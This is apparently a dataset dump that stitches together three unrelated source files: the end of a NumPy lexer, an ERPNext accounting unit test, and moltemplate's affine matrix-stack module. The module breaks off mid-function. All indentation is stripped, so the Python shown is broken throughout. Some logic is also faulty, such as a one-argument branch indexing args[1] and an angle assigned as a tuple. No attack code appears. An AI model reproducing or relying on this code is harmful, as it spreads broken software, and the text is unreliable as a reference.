'subtract', 'sum', 'svd', 'swapaxes', 'take', 'tan', 'tanh', 'tensordot',
'test', 'tile', 'tofile', 'tolist', 'tostring', 'trace', 'transpose',
'trapz', 'tri', 'tril', 'trim_zeros', 'triu', 'true_divide', 'typeDict',
'typename', 'uniform', 'union1d', 'unique', 'unique1d', 'unravel_index',
'unwrap', 'vander', 'var', 'vdot', 'vectorize', 'view', 'vonmises',
'vsplit', 'vstack', 'weibull', 'where', 'who', 'zeros', 'zeros_like'
))
def get_tokens_unprocessed(self, text):
for index, token, value in \
PythonLexer.get_tokens_unprocessed(self, text):
if token is Name and value in self.EXTRA_KEYWORDS:
yield index, Keyword.Pseudo, value
else:
yield index, token, value
def analyse_text(text):
return (shebang_matches(text, r'pythonw?(2(\.\d)?)?') or
'import ' in text[:1000]) \
and ('import numpy' in text or 'from numpy import' in text)
| mit |
mahabuber/erpnext | erpnext/accounts/doctype/period_closing_voucher/test_period_closing_voucher.py | 13 | 3362 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import frappe
from frappe.utils import flt, today
from erpnext.accounts.utils import get_fiscal_year
from erpnext.accounts.doctype.journal_entry.test_journal_entry import make_journal_entry
class TestPeriodClosingVoucher(unittest.TestCase):
def test_closing_entry(self):
year_start_date = get_fiscal_year(today())[1]
make_journal_entry("_Test Bank - _TC", "Sales - _TC", 400,
"_Test Cost Center - _TC", submit=True)
make_journal_entry("_Test Account Cost for Goods Sold - _TC",
"_Test Bank - _TC", 600, "_Test Cost Center - _TC", submit=True)
random_expense_account = frappe.db.sql("""
select t1.account,
sum(t1.debit) - sum(t1.credit) as balance,
sum(t1.debit_in_account_currency) - sum(t1.credit_in_account_currency) \
as balance_in_account_currency
from `tabGL Entry` t1, `tabAccount` t2
where t1.account = t2.name and t2.root_type = 'Expense'
and t2.docstatus < 2 and t2.company = '_Test Company'
and t1.posting_date between %s and %s
group by t1.account
having sum(t1.debit) > sum(t1.credit)
limit 1""", (year_start_date, today()), as_dict=True)
profit_or_loss = frappe.db.sql("""select sum(t1.debit) - sum(t1.credit) as balance
from `tabGL Entry` t1, `tabAccount` t2
where t1.account = t2.name and t2.report_type = 'Profit and Loss'
and t2.docstatus < 2 and t2.company = '_Test Company'
and t1.posting_date between %s and %s""", (year_start_date, today()))
profit_or_loss = flt(profit_or_loss[0][0]) if profit_or_loss else 0
pcv = self.make_period_closing_voucher()
# Check value for closing account
gle_amount_for_closing_account = frappe.db.sql("""select debit - credit
from `tabGL Entry` where voucher_type='Period Closing Voucher' and voucher_no=%s
and account = '_Test Account Reserves and Surplus - _TC'""", pcv.name)
gle_amount_for_closing_account = flt(gle_amount_for_closing_account[0][0]) \
if gle_amount_for_closing_account else 0
self.assertEqual(gle_amount_for_closing_account, profit_or_loss)
if random_expense_account:
# Check posted value for teh above random_expense_account
gle_for_random_expense_account = frappe.db.sql("""
select debit - credit as amount,
debit_in_account_currency - credit_in_account_currency
as amount_in_account_currency
from `tabGL Entry`
where voucher_type='Period Closing Voucher' and voucher_no=%s and account =%s""",
(pcv.name, random_expense_account[0].account), as_dict=True)
self.assertEqual(gle_for_random_expense_account[0].amount, -1*random_expense_account[0].balance)
self.assertEqual(gle_for_random_expense_account[0].amount_in_account_currency,
-1*random_expense_account[0].balance_in_account_currency)
def make_period_closing_voucher(self):
pcv = frappe.get_doc({
"doctype": "Period Closing Voucher",
"closing_account_head": "_Test Account Reserves and Surplus - _TC",
"company": "_Test Company",
"fiscal_year": get_fiscal_year(today())[0],
"posting_date": today(),
"remarks": "test"
})
pcv.insert()
pcv.submit()
return pcv
test_dependencies = ["Customer", "Cost Center"]
test_records = frappe.get_test_records("Period Closing Voucher")
| agpl-3.0 |
ComputationalPhysics/atomify-lammps | libs/lammps/tools/moltemplate/moltemplate/ttree_matrix_stack.py | 8 | 36977 | # Author: Andrew Jewett (jewett.aij@gmail.com)
# http://www.chem.ucsb.edu/~sheagroup
# License: 3-clause BSD License (See LICENSE.TXT)
# Copyright (c) 2012, Regents of the University of California
# All rights reserved.
import random, math
from collections import deque
from array import array
try:
from .ttree_lex import InputError, ErrorLeader, OSrcLoc
except (SystemError, ValueError):
# not installed as a package
from ttree_lex import InputError, ErrorLeader, OSrcLoc
def MultMat(dest, A, B):
""" Multiply two matrices together. Store result in "dest".
"""
I = len(A)
J = len(B[0])
K = len(B) # or len(A[0])
for i in range(0, I):
for j in range(0, J):
dest[i][j] = 0.0
for k in range(0, K):
dest[i][j] += A[i][k] * B[k][j]
def MatToStr(M):
strs = []
for i in range(0, len(M)):
for j in range(0, len(M[i])):
strs.append(str(M[i][j]) + ' ')
strs.append('\n')
return(''.join(strs))
def LinTransform(dest, M, x):
""" Multiply matrix M by 1-dimensioal array (vector) "x" (from the right).
Store result in 1-dimensional array "dest".
In this function, wetreat "x" and "dest" as a column vectors.
(Not row vectors.)
"""
I = len(M)
J = len(x)
for i in range(0, I):
dest[i] = 0.0
for j in range(0, J):
dest[i] += M[i][j] * x[j]
def AffineTransform(dest, M, x):
""" This function performs an affine transformation on vector "x".
Multiply 3-dimensional vector "x" by first three columns of 3x4
matrix M. Add to this the final column of M. Store result in "dest":
dest[0] = M[0][0]*x[0] + M[0][1]*x[1] + M[0][2]*x[2] + M[0][3]
dest[1] = M[1][0]*x[0] + M[1][1]*x[1] + M[1][2]*x[2] + M[1][3]
dest[2] = M[2][0]*x[0] + M[2][1]*x[1] + M[2][2]*x[2] + M[2][3]
"""
D = len(M)
#assert(len(M[0]) == D+1)
for i in range(0, D):
dest[i] = 0.0
for j in range(0, D):
dest[i] += M[i][j] * x[j]
dest[i] += M[i][D] # (translation offset stored in final column)
def AffineCompose(dest, M2, M1):
"""
Multiplication for pairs of 3x4 matrices is technically undefined.
However what we want to do is compose two affine transformations: M1 and M2
3x4 matrices are used to define rotations/translations
x' = M[0][0]*x + M[0][1]*y + M[0][2]*z + M[0][3]
y' = M[1][0]*x + M[1][1]*y + M[1][2]*z + M[1][3]
z' = M[2][0]*x + M[2][1]*y + M[2][2]*z + M[2][3]
We want to create a new 3x4 matrix representing an affine transformation
(M2 M1), defined so that when (M2 M1) is applied to vector x, the result is
M2 (M1 x). In other words:
first, affine transformation M1 is applied to to x
then, affine transformation M2 is applied to (M1 x)
"""
D = len(M1)
#assert(len(M1[0]) == D+1)
#assert(len(M2[0]) == D+1)
for i in range(0, D):
dest[i][D] = 0.0
for j in range(0, D + 1):
dest[i][j] = 0.0
for k in range(0, D):
dest[i][j] += M2[i][k] * M1[k][j]
dest[i][D] += M2[i][D]
def CopyMat(dest, source):
for i in range(0, len(source)):
for j in range(0, len(source[i])):
dest[i][j] = source[i][j]
class AffineStack(object):
"""
This class defines a matrix stack used to define compositions of affine
transformations of 3 dimensional coordinates (rotation and translation).
Affine transformations are represented using 3x4 matrices.
(Coordinates of atoms are thought of as column vectors: [[x],[y],[z]],
although they are represented internally in the more ordinary way [x,y,z].
To aplly an affine transformation to a vector, multiply the vector
by the matrix, from the left-hand side, as explained in the comments for:
AffineTransform(dest, M, x)
Note: The last column of the 3x4 matrix stores a translational offset.
This bears similarity with the original OpenGL matrix stack
http://content.gpwiki.org/index.php/OpenGL:Tutorials:Theory
(OpenGL uses 4x4 matrices. We don't need the final row of these matrices,
because in OpenGL, these rows are used for perspective transformations.)
http://en.wikipedia.org/wiki/Homogeneous_coordinates#Use_in_computer_graphics
"""
def __init__(self):
self.stack = None
self.M = None
self._tmp = None
self.Clear()
def Clear(self):
self.stack = deque([])
self.M = [[1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0]] # (identity, initially)
self._tmp = [[1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0]]
def PushRight(self, M):
# Push a copy of matrix self.M onto the stack
# We make no distinction between "right" and "left" here.
# All transformations are pushed onto the stack in the same way.
# (The "right" and "left" refer to whether the matrix is multiplied
# on the right of left hand side. Because not all matrices need be
# invertible, we require that matrices be popped from the stack
# in the reverse order they were pushed. This prevents the ability
# to push and pop matrices to either end of the stack in an arbitrary
# order (like append(), appendleft(), pop(), popleft()).)
self.stack.append([[self.M[i][j] for j in range(0, len(self.M[i]))]
for i in range(0, len(self.M))])
# The "Right" and "Left" refer to whether the new matrix is multiplied
# on the right or left side of the culmulatie matrix product.
# Afterwards, self._tmp = self.M * M
AffineCompose(self._tmp, self.M, M)
# sys.stderr.write('DEBUG: PushLeft()\n' +
# MatToStr(self._tmp) + '\n = \n' +
# MatToStr(M) + '\n * \n' +
# MatToStr(self.M) + '\n')
CopyMat(self.M, self._tmp) # Copy self._tmp into self.M
def PushLeft(self, M):
# Push a copy of matrix self.M onto the stack
# We make no distinction between right and left here.
# All transformations are pushed onto the stack in the same way.
# (The "right" and "left" refer to whether the matrix is multiplied
# on the right of left hand side. Because not all matrices need be
# invertible, we require that matrices be popped from the stack
# in the reverse order they were pushed. This prevents the ability
# to push and pop matrices to either end of the stack in an arbitrary
# order (like append(), appendleft(), pop(), popleft()).)
self.stack.append([[self.M[i][j] for j in range(0, len(self.M[i]))]
for i in range(0, len(self.M))])
# The "Right" and "Left" refer to whether the new matrix is multiplied
# on the right or left side of the culmulatie matrix product.
# Afterwards, self._tmp = M * self.M
AffineCompose(self._tmp, M, self.M)
# sys.stderr.write('DEBUG: PushLeft()\n' +
# MatToStr(self._tmp) + '\n = \n' +
# MatToStr(M) + '\n * \n' +
# MatToStr(self.M) + '\n')
CopyMat(self.M, self._tmp) # Copy self.tmp into self.M
def Pop(self):
CopyMat(self.M, self.stack.pop())
# (No need to return a matrix,"self.M",after popping.
# The caller can directly access self.M later.)
# return self.M
def PopRight(self):
self.Pop()
def PopLeft(self):
self.Pop()
def PushCommandsRight(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None): # position of center of object
"""Generate affine transformation matrices from simple text commands
(such as \"rotcm(90,0,0,1)\" and \"move(0,5.0,0)".
Chains of "rotcm", "movecm", "rot", and "move" commands
can also be strung together:
\"rotcm(90,0,0,1).move(0,5.0,0)\"
Commands ending in \"cm\" are carried out relative to center-of-mass
(average position) of the object, and consequently require
an additional argument (\"xcm\").
"""
self.PushRight(AffineStack.CommandsToMatrix(text, src_loc, xcm))
def PushCommandsLeft(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None): # position of center of object
self.PushLeft(AffineStack.CommandsToMatrix(text, src_loc, xcm))
def __len__(self):
return 1 + len(self.stack)
@staticmethod
def CommandsToMatrix(text, # text containing affine transformation commands
src_loc=OSrcLoc(), # for debugging
xcm=None): # position of center of object
Mdest = [[1.0, 0.0, 0.0, 0.0], [
0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0]]
M = [[1.0, 0.0, 0.0, 0.0], [0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0]]
Mtmp = [[1.0, 0.0, 0.0, 0.0], [
0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0]]
transform_commands = text.split(').')
for transform_str in transform_commands:
if transform_str.find('move(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[5:i_paren_close].split(',')
if (len(args) != 3):
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires 3 numerical arguments.')
M = [[1.0, 0.0, 0.0, float(args[0])],
[0.0, 1.0, 0.0, float(args[1])],
[0.0, 0.0, 1.0, float(args[2])]]
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
# if transform_str.find('movecm(') == 0:
# # assert(xcm != None)
# i_paren_close = transform_str.find(')')
# if i_paren_close == -1:
# i_paren_close = len(transform_str)
# args = transform_str[8:i_paren_close].split(',')
# if (len(args) != 3):
# raise InputError('Error near '+ErrorLeader(src_loc.infile, src_loc.lineno)+':\n'
# ' Invalid command: \"'+transform_str+'\"\n'
# ' This command requires 3 numerical arguments.')
# M = [[1.0, 0.0, 0.0, float(args[0])-(xcm[0])],
# [0.0, 1.0, 0.0, float(args[1])-(xcm[1])],
# [0.0, 0.0, 1.0, float(args[2])-(xcm[2])]]
# AffineCompose(Mtmp, M, Mdest)
# CopyMat(Mdest, Mtmp)
elif transform_str.find('move_rand(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[10:i_paren_close].split(',')
seed = 1
if len(args) in (2,4,7):
seed = int(args[0])
random.seed(seed)
if len(args) == 1:
sigma = float(args[1])
x = random.gauss(0.0, sigma)
y = random.gauss(0.0, sigma)
z = random.gauss(0.0, sigma)
elif len(args) == 2:
# seed = int(args[0]) this was already handled above
sigma = float(args[1])
x = random.gauss(0.0, sigma)
y = random.gauss(0.0, sigma)
z = random.gauss(0.0, sigma)
elif len(args) == 3:
x = random.gauss(0.0, float(args[0]))
y = random.gauss(0.0, float(args[1]))
z = random.gauss(0.0, float(args[2]))
elif len(args) == 4:
# seed = int(args[0]) this was already handled above
x = random.gauss(0.0, float(args[1]))
y = random.gauss(0.0, float(args[2]))
z = random.gauss(0.0, float(args[3]))
elif len(args) == 6:
x_min = float(args[0])
x_max = float(args[1])
y_min = float(args[2])
y_max = float(args[3])
z_min = float(args[4])
z_max = float(args[5])
x = x_min + (x_max - x_min)*(random.random()-0.5)
y = y_min + (y_max - y_min)*(random.random()-0.5)
z = z_min + (z_max - z_min)*(random.random()-0.5)
elif len(args) == 7:
# seed = int(args[0]) this was already handled above
x_min = float(args[1])
x_max = float(args[2])
y_min = float(args[3])
y_max = float(args[4])
z_min = float(args[5])
z_max = float(args[6])
x = x_min + (x_max - x_min)*(random.random()-0.5)
y = y_min + (y_max - y_min)*(random.random()-0.5)
z = z_min + (z_max - z_min)*(random.random()-0.5)
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 1, 2, 3, 4, 6 or 7 numerical arguments. Either:\n'
' move_rand(gauss_sigma) or\n'
' move_rand(seed, gauss_sigma) or\n'
' move_rand(gauss_sigma_x, gauss_sigma_y, gauss_sigma_z) or\n'
' move_rand(seed, gauss_sigma_x, gauss_sigma_y, gauss_sigma_z) or\n'
' move_rand(x_min, x_max, y_min, y_max, z_min, z_max) or\n'
' move_rand(seed, x_min, x_max, y_min, y_max, z_min, z_max)\n')
M = [[1.0, 0.0, 0.0, x],
[0.0, 1.0, 0.0, y],
[0.0, 0.0, 1.0, z]]
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
elif transform_str.find('rot(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[4:i_paren_close].split(',')
center_v = None
if (len(args) == 7):
center_v = [float(args[4]), float(args[5]), float(args[6])]
elif (len(args) != 4):
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 4 or 7 numerical arguments. Either:\n'
' rot(angle, axisX, axisY, axiZ) or \n'
' rot(angle, axisX, axisY, axiZ, centerX, centerY, centerZ)')
M[0][3] = 0.0 # RotMatAXYZ() only modifies 3x3 submatrix of M
M[1][3] = 0.0 # The remaining final column must be zeroed by hand
M[2][3] = 0.0
RotMatAXYZ(M,
float(args[0]) * math.pi / 180.0,
float(args[1]),
float(args[2]),
float(args[3]))
if (center_v == None):
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
else:
# Move "center_v" to the origin
moveCentToOrig = [[1.0, 0.0, 0.0, -center_v[0]],
[0.0, 1.0, 0.0, -center_v[1]],
[0.0, 0.0, 1.0, -center_v[2]]]
AffineCompose(Mtmp, moveCentToOrig, Mdest)
CopyMat(Mdest, Mtmp)
# Rotate the coordinates (relative to the origin)
AffineCompose(Mtmp, M, Mdest) # M is the rotation matrix
CopyMat(Mdest, Mtmp)
# Move the origin back to center_v
moveCentBack = [[1.0, 0.0, 0.0, center_v[0]],
[0.0, 1.0, 0.0, center_v[1]],
[0.0, 0.0, 1.0, center_v[2]]]
AffineCompose(Mtmp, moveCentBack, Mdest)
CopyMat(Mdest, Mtmp)
# # elif transform_str.find('rotcm(') == 0:
# # assert(xcm != None)
# # i_paren_close = transform_str.find(')')
# # if i_paren_close == -1:
# # i_paren_close = len(transform_str)
# # args = transform_str[6:i_paren_close].split(',')
# # if (len(args) != 4):
# # raise InputError('Error near '+ErrorLeader(src_loc.infile, src_loc.lineno)+':\n'
# # ' Invalid command: \"'+transform_str+'\"\n'
# # ' This command requires 4 numerical arguments.')
# #
# # moveCMtoOrig = [[1.0, 0.0, 0.0, -xcm[0]],
# # [0.0, 1.0, 0.0, -xcm[1]],
# # [0.0, 0.0, 1.0, -xcm[2]]]
# # AffineCompose(Mtmp, moveCMtoOrig, Mdest)
# # CopyMat(Mdest, Mtmp)
# # M[0][3] = 0.0#RotMatAXYZ() only modifies 3x3 submatrix of M
# # M[1][3] = 0.0#The remaining final column must be zeroed by hand
# # M[2][3] = 0.0
# # RotMatAXYZ(M,
# # float(args[0])*math.pi/180.0,
# # float(args[1]),
# # float(args[2]),
# # float(args[3]))
# # AffineCompose(Mtmp, M, Mdest)
# # CopyMat(Mdest, Mtmp)
# # moveCmBack = [[1.0, 0.0, 0.0, xcm[0]],
# # [0.0, 1.0, 0.0, xcm[1]],
# # [0.0, 0.0, 1.0, xcm[2]]]
# # AffineCompose(Mtmp, moveCmBack, Mdest)
# # CopyMat(Mdest, Mtmp)
elif transform_str.find('rot_rand(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[9:i_paren_close].split(',')
seed = 1
if len(args) in (2,6):
seed = int(args[0])
random.seed(seed)
raxis = [0.0, 0.0, 0.0]
if len(args) < 5:
# choose a random rotation axis
raxis_len = 0.0
while (not ((0.01<raxis_len) and (raxis_len <= 1.0))):
raxis = [-1+2.0*(random.random()-0.5) for d in range(0,3)]
raxis_len = math.sqrt(raxis[0]**2 + raxis[1]**2 + raxis[2]**2)
for d in range(0,3):
raxis[d] /= raxis_len
if len(args) == 0:
angle_min = angle_max = 2*math.pi
elif len(args) == 1:
angle_min = 0.0
angle_max = float(args[0]) * math.pi / 180.0,
elif len(args) == 5:
angle_min = float(args[0])
angle_max = float(args[1])
raxis[0] = float(args[2])
raxis[1] = float(args[3])
raxis[2] = float(args[4])
elif len(args) == 6:
seed = int(args[0])
angle_min = float(args[1])
angle_max = float(args[2])
raxis[0] = float(args[3])
raxis[1] = float(args[4])
raxis[2] = float(args[5])
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 0, 1, 2, 5 or 6 numerical arguments. Either:\n'
' rot_rand() or \n'
' rot_rand(delta_angle) or \n'
' rot_rand(seed, delta_angle) or \n'
' rot_rand(angle_min, angle_max, axisX, axisY, axiZ) or\n'
' rot_rand(seed, angle_min, angle_max, axisX, axisY, axiZ)')
angle = angle_min + (angle_max - angle_min)*(random.random() - 0.5)
M[0][3] = 0.0 # RotMatAXYZ() only modifies 3x3 submatrix of M
M[1][3] = 0.0 # The remaining final column must be zeroed by hand
M[2][3] = 0.0
RotMatAXYZ(M,
angle,
raxis[0], raxis[1], raxis[2])
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
elif transform_str.find('rotvv(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[6:i_paren_close].split(',')
center_v = None
if (len(args) == 9):
center_v = [float(args[6]), float(args[7]), float(args[8])]
elif (len(args) != 6):
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 6 or 9 numerical arguments. Either:\n'
' rotvv(Xold,Yold,Zold,Xnew,Ynew,Znew) or \n'
' rotvv(Xold,Yold,Zold,Xnew,Ynew,Znew,centerX,centerY,centerZ)')
M[0][3] = 0.0 # RotMatXYZXYZ() only modifies 3x3 submatrix of M
M[1][3] = 0.0 # The remaining final column must be zeroed by hand
M[2][3] = 0.0
RotMatXYZXYZ(M,
float(args[0]),
float(args[1]),
float(args[2]),
float(args[3]),
float(args[4]),
float(args[5]))
if (center_v == None):
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
else:
# Move "center_v" to the origin
moveCentToOrig = [[1.0, 0.0, 0.0, -center_v[0]],
[0.0, 1.0, 0.0, -center_v[1]],
[0.0, 0.0, 1.0, -center_v[2]]]
AffineCompose(Mtmp, moveCentToOrig, Mdest)
CopyMat(Mdest, Mtmp)
# Rotate the coordinates (relative to the origin)
AffineCompose(Mtmp, M, Mdest) # M is the rotation matrix
CopyMat(Mdest, Mtmp)
# Move the origin back to center_v
moveCentBack = [[1.0, 0.0, 0.0, center_v[0]],
[0.0, 1.0, 0.0, center_v[1]],
[0.0, 0.0, 1.0, center_v[2]]]
AffineCompose(Mtmp, moveCentBack, Mdest)
CopyMat(Mdest, Mtmp)
elif transform_str.find('scale(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[6:i_paren_close].split(',')
if (len(args) == 1):
scale_v = [float(args[0]), float(args[0]), float(args[0])]
center_v = [0.0, 0.0, 0.0]
elif (len(args) == 3):
scale_v = [float(args[0]), float(args[1]), float(args[2])]
center_v = [0.0, 0.0, 0.0]
elif (len(args) == 4):
scale_v = [float(args[0]), float(args[0]), float(args[0])]
center_v = [float(args[1]), float(args[2]), float(args[3])]
elif (len(args) == 6):
scale_v = [float(args[0]), float(args[1]), float(args[2])]
center_v = [float(args[3]), float(args[4]), float(args[5])]
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires either 1, 3, 4, or 6 numerical arguments. Either:\n'
' scale(ratio), or \n'
' scale(ratioX, ratioY, ratioZ),\n'
' scale(ratio, centerX, centerY, centerZ), or\n'
' scale(ratioX, ratioY, ratioZ, centerX, centerY, centerZ)')
ScaleMat(M, scale_v)
# Now worry about translation:
for d in range(0, 3):
M[d][3] = center_v[d] * (1.0 - scale_v[d])
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
# # elif transform_str.find('scalecm(') == 0:
# # assert(xcm != None)
# # i_paren_close = transform_str.find(')')
# # if i_paren_close == -1:
# # i_paren_close = len(transform_str)
# # args = transform_str[8:i_paren_close].split(',')
# #
# # moveCMtoOrig = [[1.0, 0.0, 0.0, -xcm[0]],
# # [0.0, 1.0, 0.0, -xcm[1]],
# # [0.0, 0.0, 1.0, -xcm[2]]]
# # AffineCompose(Mtmp, moveCMtoOrig, Mdest)
# # CopyMat(Mdest, Mtmp)
# #
# # M[0][3] = 0.0 #ScaleMat() only modifies 3x3 submatrix of M
# # M[1][3] = 0.0 #The remaining final column must be zeroed by hand
# # M[2][3] = 0.0
# # if (len(args) == 1):
# # ScaleMat(M, args[0])
# # elif (len(args) == 3):
# # ScaleMat(M, args)
# # else:
# # raise InputError('Error near '+ErrorLeader(src_loc.infile, src_loc.lineno)+':\n'
# # ' Invalid command: \"'+transform_str+'\"\n'
# # ' This command requires either 1 or 3 numerical arguments.')
# #
# # AffineCompose(Mtmp, M, Mdest)
# # CopyMat(Mdest, Mtmp)
# # moveCmBack = [[1.0, 0.0, 0.0, xcm[0]],
# # [0.0, 1.0, 0.0, xcm[1]],
# # [0.0, 0.0, 1.0, xcm[2]]]
# # AffineCompose(Mtmp, moveCmBack, Mdest)
# # CopyMat(Mdest, Mtmp)
else:
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Unknown transformation command: \"' + transform_str + '\"\n')
return Mdest
class MultiAffineStack(object):
def __init__(self, which_stack=None):
self.tot_stack = None
self.stack_lookup = None
self.stack_keys = None
self.stacks = None
self.M = None
self.error_if_substack_empty = False
self.Clear()
def Clear(self):
self.tot_stack = AffineStack()
self.stack_lookup = {}
self.stack_keys = deque([])
self.stacks = deque([])
self.M = self.tot_stack.M
self.error_if_substack_empty = False
def _Update(self):
self.tot_stack.Clear()
self.M = self.tot_stack.M
assert(len(self.stacks) > 0)
for stack in self.stacks:
self.tot_stack.PushRight(stack.M)
def PushStack(self, which_stack):
stack = AffineStack()
self.stack_keys.append(which_stack)
self.stack_lookup[which_stack] = stack
self.stacks.append(stack)
self.tot_stack.PushRight(stack.M)
def PopStack(self):
assert(len(self.stacks) > 0)
self.tot_stack.PopRight()
which_stack = self.stack_keys.pop()
del self.stack_lookup[which_stack]
self.stacks.pop()
def Push(self, M, which_stack=None, right_not_left=True):
if len(self.stacks) == 0:
self.PushStack(which_stack)
if which_stack == None:
stack = self.stacks[-1]
if right_not_left:
# This should copy the matrix M into stack.M
stack.PushRight(M)
else:
stack.PushLeft(M)
else:
stack = self.stack_lookup[which_stack]
if right_not_left:
stack.PushRight(M)
else:
stack.PushLeft(M)
if stack == self.stacks[-1]:
self.tot_stack.PopRight() # Replace the last matrix on self.tot_stack
# Note: Always use tot_stack.PopRight (even if
# right_not_left=False)
self.tot_stack.PushRight(stack.M) # with the the updated version.
# Note: We could call self._Update(M) here, but that is slower.
else:
self._Update()
def PushRight(self, M, which_stack=None):
self.Push(M, which_stack, right_not_left=True)
def PushLeft(self, M, which_stack=None):
self.Push(M, which_stack, right_not_left=False)
def PushCommandsRight(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None,
which_stack=None): # position of center of object
"""Generate affine transformation matrices from simple text commands
(such as \"rotcm(90,0,0,1)\" and \"move(0,5.0,0)".
Chains of "rotcm", "movecm", "rot", and "move" commands
can also be strung together:
\"rotcm(90,0,0,1).move(0,5.0,0)\"
Commands ending in \"cm\" are carried out relative to center-of-mass
(average position) of the object, and consequently require
an additional argument (\"xcm\").
"""
self.PushRight(AffineStack.CommandsToMatrix(text, src_loc, xcm),
which_stack)
def PushCommandsLeft(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None, # position of center of object
which_stack=None):
self.PushLeft(AffineStack.CommandsToMatrix(text, src_loc, xcm),
which_stack)
def Pop(self, which_stack=None, right_not_left=True):
#empty_stack_error = False
if which_stack == None:
stack = self.stacks[-1]
if len(stack) >= 1:
if right_not_left:
stack.PopRight()
else:
stack.PopLeft()
# Note: We could call self._Update(M) here, but that is slower
self.tot_stack.PopRight() # Replace the last matrix on self.tot_stack
# Note: Always use tot_stack.PopRight (even if
# right_not_left=False)
# with the the updated version.
self.tot_stack.PushRight(stack.M)
else:
assert(False)
# OPTIONAL CODE BELOW AUTOMATICALLY INVOKES self.PopStack() WHEN
# THE stacks[-1].stack IS EMPTY. PROBABLY DOES NOT WORK. IGNORE
# if (not self.error_if_substack_empty):
# if right_not_left:
# assert(len(self.stacks) > 0)
# self.PopStack()
# else:
# assert(False)
# else:
# empty_stack_error = True
else:
stack = self.stack_lookup[which_stack]
if len(stack) > 1:
if right_not_left:
stack.PopRight()
else:
stack.PopLeft()
self._Update()
else:
assert(False)
#empty_stack_error = True
def PopRight(self, which_stack=None):
self.Pop(which_stack, right_not_left=True)
def PopLeft(self, which_stack=None):
self.Pop(which_stack, right_not_left=True)
def ScaleMat(dest, scale):
for i in range(0, len(dest)):
for j in range(0, len(dest[i])):
dest[i][j] = 0.0
if ((type(scale) is float) or (type(scale) is int)):
for i in range(0, len(dest)):
dest[i][i] = scale
else:
for i in range(0, len(dest)):
dest[i][i] = scale[i]
def RotMatAXYZ(dest, angle, axis_x, axis_y, axis_z):
r = math.sqrt(axis_x * axis_x + axis_y * axis_y + axis_z * axis_z)
X = 1.0
Y = 0.0
Z = 0.0
if r > 0.0: # check for non-sensical input
X = axis_x / r
Y = axis_y / r
Z = axis_z / r
else:
angle = 0.0
# angle *= math.pi/180.0 # "angle" is assumed to be in degrees
# on second thought, let the caller worry about angle units.
c = math.cos(angle)
s = math.sin(angle)
dest[0][0] = X * X * (1 - c) + c
dest[1][1] = Y * Y * (1 - c) + c
dest[2][2] = Z * Z * (1 - c) + c
dest[0][1] = X * Y * (1 - c) - Z * s
dest[0][2] = X * Z * (1 - c) + Y * s
dest[1][0] = Y * X * (1 - c) + Z * s
dest[2][0] = Z * X * (1 - c) - Y * s
dest[1][2] = Y * Z * (1 - c) - X * s
dest[2][1] = Z * Y * (1 - c) + X * s
# formula from these sources:
# http://inside.mines.edu/~gmurray/ArbitraryAxisRotation/
# also check
# http://www.manpagez.com/man/3/glRotate/
# some pdb test commands:
# from lttree_matrixstack import *
# r = [[1.0,0.0,0.0], [0.0,1.0,0.0], [0.0,0.0,1.0]]
# RotMatAXYZ(r, 90.0, 0.0, 0.0, 1.0)
def CrossProd(dest, A, B):
dest[0] = (A[1] * B[2] - B[1] * A[2])
dest[1] = (A[2] * B[0] - B[2] * A[0])
dest[2] = (A[0] * B[1] - B[0] * A[1])
def DotProd(A, B):
c = 0.0
for d in range(0, len(A)):
c += A[d] * B[d]
return c
def Length(A):
L = 0.0
for x in A:
L += x * x
return math.sqrt(L)
def Normalize(dest, source):
assert(len(dest) == len(source))
L = Length(source)
for d in range(0, len(source)):
dest[d] = source[d] / L
def RotMatXYZXYZ(dest,
xold, yold, zold,
